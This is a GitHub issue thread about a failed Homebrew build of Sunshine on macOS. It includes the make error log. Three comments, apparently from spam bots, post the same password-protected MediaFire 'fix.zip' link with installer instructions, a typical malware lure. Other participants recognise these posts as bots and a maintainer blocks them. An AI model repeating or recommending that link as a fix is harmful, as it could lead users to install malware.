### ISSUE TITLE
macOS install via Brew fails at make step

### ISSUE THREAD

**Issue by simonfalke-01** [LizardByte/Sunshine#3098]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Is your issue described in the documentation?

- [X] I have read the documentation

### Is your issue present in the latest beta/pre-release?

This issue is present in the latest pre-release

### Describe the Bug

Running `brew install` fails at the `make -j` step.

```
==> Installing sunshine from lizardbyte/homebrew
==> cmake -S . -B build -DBUILD_WERROR=ON -DOPENSSL_ROOT_DIR=/usr/local/opt/openssl@3 -DSUNSHINE_ASSETS_DIR=sunshine/assets -DSUNSHINE_BUILD_HOMEBREW=ON -DTESTS_ENABLE_PYTHON_TESTS=OFF
==> make -j
Last 15 lines from /Users/brandonli/Library/Logs/Homebrew/sunshine/02.make:
13 errors generated.
make[2]: *** [tests/CMakeFiles/test_sunshine.dir/__/src/process.cpp.o] Error 1
make[2]: *** Waiting for unfinished jobs....
18 errors generated.
make[2]: *** [tests/CMakeFiles/test_sunshine.dir/__/src/platform/macos/misc.mm.o] Error 1
8 errors generated.
make[2]: *** [tests/CMakeFiles/test_sunshine.dir/__/src/stream.cpp.o] Error 1
8 errors generated.
make[2]: *** [tests/CMakeFiles/test_sunshine.dir/__/src/httpcommon.cpp.o] Error 1
8 errors generated.
make[2]: *** [tests/CMakeFiles/test_sunshine.dir/__/src/confighttp.cpp.o] Error 1
7 errors generated.
make[2]: *** [tests/CMakeFiles/test_sunshine.dir/__/src/nvhttp.cpp.o] Error 1
make[1]: **
* [tests/CMakeFiles/test_sunshine.dir/all] Error 2
make: *** [all] Error 2

If reporting this issue please do so at (not Homebrew/brew or Homebrew/homebrew-core):
  https://github.com/lizardbyte/homebrew-homebrew/issues
```

Full 02.make file:
[02.make.txt](https://github.com/user-attachments/files/16744047/02.make.txt)

### Expected Behavior

Successful installation.

### Host Operating System

macOS

### Operating System Version

14.4.1 (23E224)

### Architecture

64 bit

### Sunshine commit or version

88ce5077b04e56a4b8717b67b685b1d47a0d0a00

### Package

macOS - Homebrew

### GPU Type

AMD

### GPU Model

5500M

### GPU Driver/Mesa Version

NA

### Capture Method

None

### Config

```Shell
NA
```

### Relevant log output

```shell
NA
```

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by simonfalke-01** [comment]
Lol, nice bots.

**Comment by simonfalke-01** [comment]
Saw #3052.

**Comment by Hazer** [comment]
@simonfalke-01 Oof, thanks!

**Comment by Hazer** [comment]
@ReenigneArcher I reported, but can you block those bots?

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ReenigneArcher** [comment]
Done
